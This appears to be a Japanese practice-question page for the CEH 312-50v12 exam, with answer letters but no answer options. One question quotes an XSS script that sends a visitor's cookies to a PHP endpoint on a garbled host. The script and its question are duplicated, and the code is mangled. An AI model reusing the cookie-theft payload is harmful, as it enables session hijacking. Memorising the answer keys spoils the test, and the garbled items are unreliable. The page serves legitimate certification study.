312-50v12日本語 無料問題集「ECCouncil Certified Ethical Hacker Exam (312-50v12日本語版)」
プロのハッカーであるアリスは、ある組織のクラウド サービスをターゲットにしました。彼女はスピア フィッシング メールを送信してターゲットの MSP プロバイダーに侵入し、カスタム マルウェアを配布してユーザー アカウントを侵害し、クラウド サービスへのリモート アクセスを取得しました。さらに、彼女は自分の MSP アカウントを使用してターゲットの顧客プロファイルにアクセスし、顧客データを圧縮して MSP に保存しました。そして、この情報を使用して、ターゲットの組織に対してさらに攻撃を開始しました。上記のシナリオでアリスが実行したクラウド攻撃は次のどれですか。
正解:A
解答を投票する
解説: (JPNTest メンバーにのみ表示されます)
ある日、ジュディはフォーラムを作成しました。彼女は、あるユーザーがコメントを書かずに奇妙な画像を投稿していることを発見しました。
彼女はすぐにセキュリティの専門家に電話し、その画像の背後に次のコードが隠されていることを発見しました。
<スクリプト>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />);
</スクリプト>
画像をクリックしたユーザーにはどのような問題が発生しましたか?
彼女はすぐにセキュリティの専門家に電話し、その画像の背後に次のコードが隠されていることを発見しました。
<スクリプト>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />);
</スクリプト>
画像をクリックしたユーザーにはどのような問題が発生しましたか?
正解:D
解答を投票する
解説: (JPNTest メンバーにのみ表示されます)